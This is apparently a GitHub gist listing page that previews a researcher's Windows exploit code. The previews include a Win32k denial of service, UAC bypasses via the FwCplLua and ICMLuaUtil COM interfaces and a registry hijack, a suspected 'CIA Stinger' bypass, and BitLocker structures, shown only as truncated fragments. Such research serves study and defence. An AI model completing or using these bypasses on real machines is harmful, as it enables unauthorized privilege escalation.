hfiref0x
hfiref0x
/ NtUserOpenDesktop.c
Created
November 29, 2017 14:12
Win32k NtUserOpenDesktop Denial Of Service (9200-17046)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Win32k NtUserOpenDesktop->OpenDesktop Denial Of Service feature. | |
| Working range: x64 Windows 8 (9200) up to Windows 10 RS4 (17046). | |
| x86 versions not tested. | |
| Feature: |
hfiref0x
/ akagi_42b.c
Last active
August 21, 2025 16:06
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| typedef interface IFwCplLua IFwCplLua; | |
| typedef struct IFwCplLuaInterfaceVtbl { | |
| BEGIN_INTERFACE | |
| HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
| __RPC__in IFwCplLua * This, | |
| __RPC__in REFIID riid, | |
| _COM_Outptr_ void **ppvObject); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| typedef interface ICMLuaUtil ICMLuaUtil; | |
| typedef struct ICMLuaUtilVtbl { | |
| BEGIN_INTERFACE | |
| HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
| __RPC__in ICMLuaUtil * This, | |
| __RPC__in REFIID riid, | |
| _COM_Outptr_ void **ppvObject); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Original source link https://twitter.com/hFireF0X/status/887930221466443776 | |
| // If you are here from any other link - do know that they just steal original info without giving any credit to source | |
| // This bug has been fixed in 16273 public build. | |
| #include "global.h" | |
| HINSTANCE g_hInstance; | |
| HANDLE g_ConOut = NULL; | |
| BOOL g_ConsoleOutput = FALSE; | |
| WCHAR g_BE = 0xFEFF; |
hfiref0x
/ gist:59c689a14f1fc2302d858ae0aa3f6b86
Created
May 27, 2017 06:30
CIA Stinger UAC bypass (likely)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DWORD Error, bytesIO; | |
| NTSTATUS Status; | |
| HANDLE hProcessToken = NULL, hNewToken = NULL, hTest; | |
| BOOL bCond = FALSE; | |
| SHELLEXECUTEINFO shinfo; | |
| SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY; | |
| TOKEN_MANDATORY_LABEL tml, *ptml; | |
| PSID pIntegritySid = NULL; | |
| STARTUPINFO si; | |
| PROCESS_INFORMATION pi; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define BITLOCKER_SIGNATURE "-FVE-FS-" | |
| #define BITLOCKER_SIGNATURE_SIZE sizeof(BITLOCKER_SIGNATURE) | |
| #pragma pack(push,1) | |
| typedef struct _FVEFS_BOOT_RECORD { | |
| BYTE JumpCode[3]; //+0x0 | |
| BYTE Signature[8]; //+0x3 | |
| WORD SectorSize; //+0xB | |
| BYTE SectorsPerCluster; //+0xD | |
| WORD ReservedClusters; //+0xE |
hfiref0x
/ gist:c5d427a6e3b67ed70ede9d34def329a2
Created
April 18, 2017 04:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| akagi (uacme) | |
| akatsuki (uacme) | |
| aoba (dsefix) | |
| fubuki (uacme) | |
| furutaka (tdl) | |
| harasume (zeroaccess) | |
| hibiki (uacme) | |
| ikazuchi (uacme) | |
| inazuma (uacme) | |
| isonami (sxsexp) |
NewerOlder